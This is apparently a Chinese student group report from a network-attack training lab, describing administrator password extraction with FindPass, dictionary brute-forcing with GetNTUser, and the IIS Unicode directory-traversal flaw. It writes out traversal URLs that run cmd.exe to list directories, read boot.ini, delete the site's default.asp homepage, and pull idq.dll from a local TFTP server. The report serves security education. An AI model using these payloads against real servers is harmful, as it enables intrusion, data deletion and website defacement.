网络攻击技术实验报告.docx

网络攻击技术实验报告.docx

《网络攻击技术实验报告.docx》由会员分享，可在线阅读，更多相关《网络攻击技术实验报告.docx（9页珍藏版）》请在冰豆网上搜索。

网络攻击技术实验报告

XX技术学院               

《网络攻击技术实训》

分组总结报告

XX 班XX 组

组长  XXX   

组员 XXX         

20XX年XX月XX日

一、分组计划及评分表  3

二、网络攻击技术实验总结报告  4

（一）实训目的  4

（二）实训任务  4

（三）实训过程及步骤  5

一）物理攻击  5

二）暴力攻击  5

三）漏洞攻击  7

（四）实训分析与总结（实训过程遇到的问题、解决方法、收获体会）  10

一、分组计划及评分表

分组准备及评分表

班级

XX

组长

XX

项目小组编号

XX

一、项目名称：

网络攻击技术实验报告

二、项目小组的组成（任务分配、根据组员的表现确定其个人系数）：

编号

姓名

学号

在项目小组中的任务

个人贡献系数

（0.0–1.0）

个人得分

1

2

3

4

5

6

二、网络攻击技术实验总结报告

（一）实训目的

实训的目的主要是使得我们掌握网络攻击技术领域的基本理论和方法，具有较强的自律意识和信息安全意识，具有使用网络攻击技术的软硬件产品解决实际问题的能力，能够完成一系列的实验内容，并且能够熟练使用相关工具和软件。

在实训学习和实践过程中，我们以具体的攻击软件和攻击防范工具，进行相关的技术训练，在强化理论的同时，掌握相关操作技能。

通过攻击系统实例演示，使我们了解入侵检测系统的原理和使用。

通过网络攻击实例，使我们了解网络攻击实现的原理，加强防范意识。

通过实践网络攻击与防范攻击技术，使我们掌握网络攻击及防范技术。

（二）实训任务

1.获取管理员密码攻击。

将FindPass.exe拷贝到C盘根目录，执行该程序,即可以得到管理员密码等信息

2.暴力破解操作系统密码可以用工具软件GetNTUser

3.利用Unicode漏洞进行的攻击：

a）读取出计算机上目录列表

b）读取对方计算机上装了几个操作系统

c）使用Unicode漏洞删除主页

d）利用Unicode漏洞入侵系统

（三）实训过程及步骤

一）物理攻击 

获取管理员密码攻击。

将FindPass.exe拷贝到C盘根目录，使用命令提示符进入操作界面，输入Findpass命令，执行该程序,即可以得到管理员密码等信息。

如图：

图1所示是未设置密码时的信息：

图1

如图：

图2所示是在设置密码后的现实的信息：

图2

二）暴力攻击 

暴力破解操作系统密码可以用工具软件GetNTUser，字典攻击是最常见的一种暴力攻击。

利用人的习惯思维，并尝试各种可能的组合来猜测密码；强壮的密码可有效击败字典攻击，它应该由多位字母、数字、通配符组成。

1）.启动GetNTUser软件，得到如图：

图3所示的结果

图3

2）.添加主机IP10.130.22.100，如图：

图4所示：

图4

3）.设置字典的选择，如图：

图5所示：

图5

4）.字典的穷举设置，如图：

图6所示：

图6

如图：

图7所示：

a）扫描出主机上存在的用户名,管理员为Administrator

b）自动猜测空密码和与用户名相同的密码

c）可以使用指定密码字典猜测密码，密码为空

图7

三）漏洞攻击 

利用Unicode漏洞进行的攻击：

a）读取出计算机上目录列表

b）读取对方计算机上装了几个操作系统

c）使用Unicode漏洞删除主页

d）利用Unicode漏洞入侵系统

1.在利用Unicode漏洞进行的攻击时之前，ping两个系统是否连通，如图：

图8所示：

图8

2.ping通过后，打开浏览器，浏览器地址栏中输入：

..%c0%2f../winnt/system32/cmd.exe?

/c+dir+c:

\

得到如图：

图9所示的信息：

读取出计算机上目录列表

图9

3.读取计算机上的目录列表后，输入：

+type+c:

\boot.ini

得到如图：

图10所示的信息，读取对方计算机上装了几个操作系统：

图10

4.读取对方计算机上装了几个操作系统后，

在C盘装入inetpub\wwwroot\default.asp，如图：

图11所示：

图11

输入：

2f../winnt/system32/cmd.exe?

/c+dele+c:

\inetpub\wwwroot\default.asp

得到如图：

图12所示的信息，使用Unicode漏洞删除主页：

图12

删除c:

\inetpub\wwwroot\default.asp过后的信息，如图：

图13所示：

图13

图11

5.使用Unicode漏洞删除主页后，利用Unicode漏洞入侵系统

1）首先需要向对方服务器上传一些文件

2）下载一个tftpd32.exe，如图：

图14所示：

图14

3）首先在本地计算机上搭建一个TFTP服务器，可以使用tftpd32.exe建立服务器普通文件传输协议TFTP（TextFileTransmissionProtocol）一般用来传输单个文件。

4）点击tftpd32.exe文件，设置本机IP为192.168.1.100，被攻击的IP为192.168.1.110，接收的文件为idq.dll

如图：

图15所示：

图15

5）由于权限不够，不能发送名为“idq.dll文件，权限设置好后，系统拒绝传送文件，但是可以从另一个系统获取一个名为“idq.dll”的文件，如图：

图16所示：

图16

6）在浏览器中执行命令：

.100/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+tftp+-i+192.168.1.110+get+idq.dll由于权限不够，无法实现。

（四）实训分析与总结（实训过程遇到的问题、解决方法、收获体会）

（1）实训中遇到的问题及解决方法：

1.获取管理员密码攻击时，设置了密码，但是使用FindPass.exe时，没有显示出密码，讲系统重启过后，显示了密码。

2.暴力破解操作系统密码，使用工具软件GetNTUser时，出现拒绝访问，是设置问题。

3.利用Unicode漏洞进行攻击时，获取另一个系统的信息时，开始的两个系统不匹配，无法使用Unicode漏洞进行攻击。

设置两个系统的关系，包含有漏洞才可行。

4.使用浏览器连接两个系统的文件传输时，无法找到需要的文件，发现是由于权限不够，设置可读取权限，得到需要的文件。

（2）收获体会：

获取管理员密码攻击。

将FindPass.exe拷贝到C盘根目录，执行该程序,即可以得到管理员密码等信息；暴力破解操作系统密码可以用工具软件GetNTUser；利用Unicode漏洞进行的攻击：

读取出计算机上目录列表；读取对方计算机上装了几个操作系统；使用Unicode漏洞删除主页；利用Unicode漏洞入侵系统。

本次实训使得我们掌握网络攻击技术领域的基本理论和方法，具有较强的自律意识和信息安全意识，具有使用网络攻击技术的软硬件产品解决实际问题的能力，能够完成一系列的实验内容，并且能够熟练使用相关工具和软件。

在实训学习和实践过程中，我们以具体的攻击软件和攻击防范工具，进行相关的技术训练，在强化理论的同时，掌握相关操作技能。

通过攻击系统实例演示，使我们了解入侵检测系统的原理和使用。

通过网络攻击实例，使我们了解网络攻击实现的原理，加强防范意识。

通过实践网络攻击与防范攻击技术，使我们掌握网络攻击及防范技术。